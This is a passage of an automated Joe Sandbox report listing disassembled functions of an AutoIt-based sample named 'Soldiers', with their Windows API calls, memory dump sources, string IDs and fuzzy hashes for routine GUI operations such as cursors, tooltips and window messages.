                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: AutoIt v3 GUI
                                                          • API String ID: 1458621304-248962490
                                                          • Opcode ID: aa1d504afad64373cca3816a02739c2720923c71ce61080f1956e8e236379810
                                                          • Instruction ID: a2fddaf1d2ab74e0f775dd7db38060f454b3a0031a88046b4c5aa49eea529220
                                                          • Opcode Fuzzy Hash: aa1d504afad64373cca3816a02739c2720923c71ce61080f1956e8e236379810
                                                          • Instruction Fuzzy Hash: 86B19F7164424ADFDB14DFA9CC49BAD77B8FB49310F104119FA15E7290DB74A850DF50
                                                          Function 00900429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F1821: _memmove.LIBCMT ref: 008F185B
                                                          • GetForegroundWindow.USER32(00970980,?,?,?,?,?), ref: 009004E3
                                                          • IsWindow.USER32(?,?,?,?,00970980,?,?,00000000,00970980), ref: 009366BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$Foreground_memmove
                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                          • API String ID: 3828923867-1919597938
                                                          • Opcode ID: a21c461a5bdd7ed80fa6e79ee70856e9e5de552358daedb245108174bbf2df28
                                                          • Instruction ID: 1ace9da953a0891fb6af01d3cafc805c1502499e46bdf1150208b0218d0b30fa
                                                          • Opcode Fuzzy Hash: a21c461a5bdd7ed80fa6e79ee70856e9e5de552358daedb245108174bbf2df28
                                                          • Instruction Fuzzy Hash: 89D1B730104306EFCB14EF64C841AAABBF9FF95348F508A19F556871A2DB30E959CF92
                                                          Function 0096441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 009644AC
                                                          • SendMessageW.USER32(?,00001032,00000000,00000000,00970980), ref: 0096456C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                          • API String ID: 3974292440-719923060
                                                          • Opcode ID: 7ec5f28c74af3494c4acf7d8b48d0b79a703f714b44183cc6aeb0ade12c783b2
                                                          • Instruction ID: cd61baabcc5ad8cf7ebef53ab2aa1b347e245a14d9325dc2159d60071bf3012c
                                                          • Opcode Fuzzy Hash: 7ec5f28c74af3494c4acf7d8b48d0b79a703f714b44183cc6aeb0ade12c783b2
                                                          • Instruction Fuzzy Hash: 9FA14D702187419FCB14EF68C851B6AB3E9FF85314F104968B89A9B2E2DB34ED05CB52
                                                          Function 009556C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 009556E1
                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 009556EC
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 009556F7
                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00955702
                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0095570D
                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00955718
                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00955723
                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 0095572E
                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00955739
                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00955744
                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 0095574F
                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 0095575A
                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00955765
                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00955770
                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0095577B
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00955786
                                                          • GetCursorInfo.USER32(?), ref: 00955796
                                                          • GetLastError.KERNEL32(00000001,00000000), ref: 009557C1
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                          • String ID:
                                                          • API String ID: 3215588206-0
                                                          • Opcode ID: 0e3049d8f2f13e8b89727b27a7cc356c7215ef1e124223b102abefcf22a6cb1e
                                                          • Instruction ID: 2c5a28ba17e0835bd1368510e78e71482b36a18b972dbf913ea1d7a66fafa9cf
                                                          • Opcode Fuzzy Hash: 0e3049d8f2f13e8b89727b27a7cc356c7215ef1e124223b102abefcf22a6cb1e
                                                          • Instruction Fuzzy Hash: 04415470E04319AADB109FBA8C49D6EFFF8EF55B50B10452FE509E7291DAB8A400CF51
                                                          Function 0093B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0093B17B
                                                          • __swprintf.LIBCMT ref: 0093B21C
                                                          • _wcscmp.LIBCMT ref: 0093B22F
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?,00000202,?), ref: 0093B284
                                                          • _wcscmp.LIBCMT ref: 0093B2C0
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0093B2F7
                                                          • GetDlgCtrlID.USER32(?), ref: 0093B349
                                                          • GetWindowRect.USER32(?,?), ref: 0093B37F
                                                          • GetParent.USER32(?,?), ref: 0093B39D
                                                          • ScreenToClient.USER32(00000000), ref: 0093B3A4
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0093B41E
                                                          • _wcscmp.LIBCMT ref: 0093B432
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0093B458
                                                          • _wcscmp.LIBCMT ref: 0093B46C
                                                            • Part of subcall function 0090385C: _iswctype.LIBCMT ref: 00903864
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                          • String ID: %s%u
                                                          • API String ID: 3744389584-679674701
                                                          • Opcode ID: 6a62283494f214843842957f06b742b7ae57200e111950dcc7d8c03068a88eff
                                                          • Instruction ID: 80539f112c157af6c43d73a53db541400c7e8853b57b6fe27b309ce00ef49b1f
                                                          • Opcode Fuzzy Hash: 6a62283494f214843842957f06b742b7ae57200e111950dcc7d8c03068a88eff
                                                          • Instruction Fuzzy Hash: F7A1BF72204206AFD714DF64C898BAAB7ECFF84354F108629FA99C21A1D730E955CF91
                                                          Function 0093BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0093BAB1
                                                          • _wcscmp.LIBCMT ref: 0093BAC2
                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0093BAEA
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 0093BB07
                                                          • _wcscmp.LIBCMT ref: 0093BB25
                                                          • _wcsstr.LIBCMT ref: 0093BB36
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0093BB6E
                                                          • _wcscmp.LIBCMT ref: 0093BB7E
                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0093BBA5
                                                          • GetClassNameW.USER32(00000018,?,00000400,?,?), ref: 0093BBEE
                                                          • _wcscmp.LIBCMT ref: 0093BBFE
                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0093BC26
                                                          • GetWindowRect.USER32(00000004,?), ref: 0093BC8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                          • String ID: @$ThumbnailClass
                                                          • API String ID: 1788623398-1539354611
                                                          • Opcode ID: f8c996e60de34442aeb45b24e0d17d449a60ccacfa1ed8a945cad516d1fded20
                                                          • Instruction ID: 3328ed87a59207ea971e38849e02946086e5bc1d34e06609da5e634ac9e28d22
                                                          • Opcode Fuzzy Hash: f8c996e60de34442aeb45b24e0d17d449a60ccacfa1ed8a945cad516d1fded20
                                                          • Instruction Fuzzy Hash: 2D817C720082099BDB15DF18C885FAAB7ECFF84314F04956AFE899A096DB34DE45CF61
                                                          Function 0093B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                          • API String ID: 1038674560-1810252412
                                                          • Opcode ID: 643879eec9197868a369ec7781123cf56dac1cf2d65a159533f7fe828b5a56bf
                                                          • Instruction ID: 7cff5f081810a42d046c031a09d529fc5ffb54b9fb08fc966be57833179d0f31
                                                          • Opcode Fuzzy Hash: 643879eec9197868a369ec7781123cf56dac1cf2d65a159533f7fe828b5a56bf
                                                          • Instruction Fuzzy Hash: C531B031A44209EADF04EAA8CD47FBD77A8EF60758F600125F751B10D1EF566E048A92
                                                          Function 0093CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadIconW.USER32(00000063), ref: 0093CBAA
                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0093CBBC
                                                          • SetWindowTextW.USER32(?,?), ref: 0093CBD3
                                                          • GetDlgItem.USER32(?,000003EA), ref: 0093CBE8
                                                          • SetWindowTextW.USER32(00000000,?), ref: 0093CBEE
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0093CBFE
                                                          • SetWindowTextW.USER32(00000000,?), ref: 0093CC04
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0093CC25
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0093CC3F
                                                          • GetWindowRect.USER32(?,?), ref: 0093CC48
                                                          • SetWindowTextW.USER32(?,?), ref: 0093CCB3
                                                          • GetDesktopWindow.USER32(?), ref: 0093CCB9
                                                          • GetWindowRect.USER32(00000000), ref: 0093CCC0
                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0093CD0C
                                                          • GetClientRect.USER32(?,?), ref: 0093CD19
                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0093CD3E
                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0093CD69
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                          • String ID:
                                                          • API String ID: 3869813825-0
                                                          • Opcode ID: a9d862012c19befbbcf8cfd3d372f551b4f05b5167eb52a668009602c0df7a38
                                                          • Instruction ID: d9ddf8a33d6750532bedac8faa4d5a09245050c911418e6c912f083d2fd67a23
                                                          • Opcode Fuzzy Hash: a9d862012c19befbbcf8cfd3d372f551b4f05b5167eb52a668009602c0df7a38
                                                          • Instruction Fuzzy Hash: 08516071900B09EFDB20DFA8CE85B6EBBF9FF44705F004918E58AA25A0C774A954DF50
                                                          Function 0096A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 0096A87E
                                                          • DestroyWindow.USER32(00000000,?), ref: 0096A8F8
                                                            • Part of subcall function 008F1821: _memmove.LIBCMT ref: 008F185B
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0096A972
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030,?), ref: 0096A994
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0096A9A7
                                                          • DestroyWindow.USER32(00000000), ref: 0096A9C9
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 0096AA00
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0096AA19
                                                          • GetDesktopWindow.USER32(?,?), ref: 0096AA32
                                                          • GetWindowRect.USER32(00000000), ref: 0096AA39
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0096AA51
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0096AA69
                                                            • Part of subcall function 008E29AB: GetWindowLongW.USER32(?,000000EB,?,?,?,008E1AE0,?,?,?,?,?,?,008E1D8F,?,?,?), ref: 008E29BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 1297703922-3619404913
                                                          • Opcode ID: 636fca8922e54ee9c2aa8547c13e5290ad3000442b170fc46aa8ba39f6a876e8
                                                          • Instruction ID: 5c777e476b00d6d7683b9bad0d78c226c28229a6c942e28d2f6a157458a44439
                                                          • Opcode Fuzzy Hash: 636fca8922e54ee9c2aa8547c13e5290ad3000442b170fc46aa8ba39f6a876e8
                                                          • Instruction Fuzzy Hash: 7971B871154204AFD721CF68CC49F6ABBE9FB89704F04061DF98A972A0C735E942DFA2
                                                          Function 0096CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,008E1CE4,?), ref: 008E29F3
                                                          • DragQueryPoint.SHELL32(?,?,?,?,?,?), ref: 0096CCCF
                                                            • Part of subcall function 0096B1A9: ClientToScreen.USER32(?,?,?,?,?,?,?,?,?,0096C6BC,?,?,?), ref: 0096B1D2
                                                            • Part of subcall function 0096B1A9: GetWindowRect.USER32(?,?), ref: 0096B248
                                                            • Part of subcall function 0096B1A9: PtInRect.USER32(?,?,0096C6BC,?,?), ref: 0096B258
                                                          • SendMessageW.USER32(?,000000B0,?,?,?,?,?), ref: 0096CD38
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0096CD43
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0096CD66
                                                          • _wcscat.LIBCMT ref: 0096CD96
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0096CDAD
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0096CDC6
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0096CDDD
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0096CDFF
                                                          • DragFinish.SHELL32(?), ref: 0096CE06
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0096CEF9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                          • API String ID: 169749273-3440237614
                                                          • Opcode ID: b4b286f989a7609ca069ba677674f075e1c970ab4ef537b2a894777a2407f8b6
                                                          • Instruction ID: 5429761f0dd24330147ab5d98341eca30cb30323c1787805d6c70e8baac2a77d
                                                          • Opcode Fuzzy Hash: b4b286f989a7609ca069ba677674f075e1c970ab4ef537b2a894777a2407f8b6
                                                          • Instruction Fuzzy Hash: C9616A72108301AFC711DF65DC89EABBBE8FFC9750F000A1DF695921A1DB719A49CB92
                                                          Function 009482D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #8.OLEAUT32(00000000,0000004E,?,?,?,?,?,?,0000002A,00000000,00970980), ref: 0094831A
                                                          • #10.WSOCK32(00037269,?,?,?,?,?,?,0000002A,00000000,00970980), ref: 00948323
                                                          • #9.WSOCK32(00037269,?,?,?,?,?,0000002A,00000000,00970980), ref: 0094832F
                                                          • #185.OLEAUT32(?,?,?,?,0000002A,00000000,00970980), ref: 0094841D
                                                          • __swprintf.LIBCMT ref: 0094844D
                                                          • #220.OLEAUT32(?,?,?,?,?,00000029,00000000,Default), ref: 00948479
                                                          • #8.OLEAUT32(?,?,00037269,00000000), ref: 0094852A
                                                          • #6.OLEAUT32(?,?), ref: 009485BE
                                                          • #9.WSOCK32(?), ref: 00948618
                                                          • #9.WSOCK32(?), ref: 00948627
                                                          • #8.OLEAUT32(00000000,0000004E,?,00037269,00000000), ref: 00948665
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: #185#220__swprintf
                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                          • API String ID: 2563594795-3931177956
                                                          • Opcode ID: 6e9f797f6d934d9ae781a3c6356a7272cf00e36044b6bebf9418ee8f3fd263af
                                                          • Instruction ID: 3e99e3af03abd5da27e6b53d8b28873c7e763b1801b939a0c69db4e96635b967
                                                          • Opcode Fuzzy Hash: 6e9f797f6d934d9ae781a3c6356a7272cf00e36044b6bebf9418ee8f3fd263af
                                                          • Instruction Fuzzy Hash: FFD1CE71A0451AEBDF20AFA5C884F6FB7B8FF45B00F148955E505AB291DF34E840EBA1
                                                          Function 009649CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00964A61
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000,00970980), ref: 00964AAC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 3974292440-4258414348
                                                          • Opcode ID: ecf90729cc26a7ee7c059244268a1b26704cf30f04b08820372f0b71b7690de8
                                                          • Instruction ID: a978c265a2932ab1a8a596522d3ddfdb792a4cbada321ca557552f589e61e1a1
                                                          • Opcode Fuzzy Hash: ecf90729cc26a7ee7c059244268a1b26704cf30f04b08820372f0b71b7690de8
                                                          • Instruction Fuzzy Hash: 1B917D702047019FCB14EF64C851BADB7A5FF95354F108858F89A9B3A2CB35ED49CB92
                                                          Function 0096BE70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010,00000000,?,?,?,?,?,009697E7), ref: 0096BF26
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009697E7), ref: 0096BF82
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0096BFBB
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0096BFFE
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0096C035
                                                          • FreeLibrary.KERNEL32(?), ref: 0096C041
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001,?,?,?,?,009697E7), ref: 0096C051
